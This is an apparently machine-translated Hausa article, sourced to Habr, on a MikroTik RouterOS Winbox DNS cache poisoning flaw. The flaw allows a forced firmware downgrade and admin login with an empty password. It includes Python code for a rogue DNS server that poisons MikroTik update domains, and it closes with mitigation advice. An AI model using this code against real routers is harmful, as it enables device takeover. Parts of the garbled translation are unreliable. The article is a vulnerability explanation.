Ikon rage darajar na'urori daga nesa dangane da RouterOS (Mikrotik) yana sanya dubunnan na'urorin cibiyar sadarwa cikin haɗari. Rashin lahani yana da alaƙa da guba na cache na DNS na yarjejeniyar Winbox kuma yana ba ku damar loda abubuwan da suka gabata (tare da saitin kalmar sirri ta tsoho) ko ingantaccen firmware akan na'urar.
Bayanan rauni
Tashar ta RouterOS tana goyan bayan ƙudurin ƙuduri don neman DNS.
Ana sarrafa wannan buƙatar ta hanyar binary da ake kira warwarewa. Resolver yana ɗaya daga cikin binaries da yawa waɗanda ke haɗi zuwa ka'idar Winbox ta RouterOS. A babban matakin, "saƙonnin" da aka aika zuwa tashar Winbox za a iya tura su zuwa binaries daban-daban a cikin RouterOS bisa tsarin ƙidayar ƙira.
Ta hanyar tsoho, RouterOS yana da fasalin uwar garken DNS a kashe.
Duk da haka, ko da lokacin da aikin uwar garke ya ƙare, mai ba da hanya tsakanin hanyoyin sadarwa yana kula da cache na DNS.
Lokacin da muka yi tambaya ta amfani da winbox_dns_request misali.com, na'ura mai ba da hanya tsakanin hanyoyin sadarwa zai cache sakamakon.
Tun da za mu iya ƙayyade uwar garken DNS wanda buƙatun ya kamata ta shiga, shigar da adiresoshin da ba daidai ba abu ne mai mahimmanci. Misali, zaku iya saita aiwatar da sabar DNS daga don ko da yaushe amsa tare da wani rikodin dauke da adireshin IP 192.168.88.250.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Yanzu idan kun bincika misali.com ta amfani da Winbox, zaku iya ganin cewa cache ɗin DNS na na'ura mai ba da hanya tsakanin hanyoyin sadarwa yana da guba.
Tabbas, gubar example.com ba ta da amfani sosai tunda na'ura mai ba da hanya tsakanin hanyoyin sadarwa ba zai yi amfani da ita ba. Koyaya, na'ura mai ba da hanya tsakanin hanyoyin sadarwa yana buƙatar samun damar haɓakawa.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com da download.mikrotik.com. Kuma godiya ga wani kuskure, yana yiwuwa a yi musu guba a lokaci guda.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Mai ba da hanya tsakanin hanyoyin sadarwa yana buƙatar izini ɗaya, kuma mun ba da baya biyar. Na'ura mai ba da hanya tsakanin hanyoyin sadarwa baya cache duk waɗannan martani daidai.
Babu shakka, wannan harin yana da amfani idan na'ura mai ba da hanya tsakanin hanyoyin sadarwa tana aiki azaman uwar garken DNS, tunda yana ba da damar kai hari ga abokan cinikin na'ura mai ba da hanya tsakanin hanyoyin sadarwa.
Wannan harin kuma yana ba ku damar yin amfani da mummunan rauni: ragewa ko dawo da sigar RouterOS. Maharin yana sake ƙirƙira dabaru na sabar sabuntawa, gami da canjin log, kuma yana tilasta RouterOS fahimtar sigar da ta gabata (masu rauni) azaman na yanzu. Haɗarin a nan yana cikin gaskiyar cewa lokacin da aka sabunta sigar, an sake saita kalmar wucewar mai gudanarwa zuwa ƙimar da ta dace - mai hari zai iya shiga cikin tsarin tare da kalmar sirri mara komai!
Harin yana aiki sosai, duk da cewa yana aiwatar da wasu ƙwayoyin cuta da yawa, gami da waɗanda ke da alaƙa , amma wannan rigar wata dabara ce da ba za a iya amfani da ita ba kuma amfani da ita don haramun haramun ne.
kariya
Kashe Winbox kawai yana ba ku damar kare kanku daga waɗannan hare-haren. Duk da dacewar gudanarwa ta hanyar Winbox, yana da kyau a yi amfani da yarjejeniyar SSH.
source: www.habr.com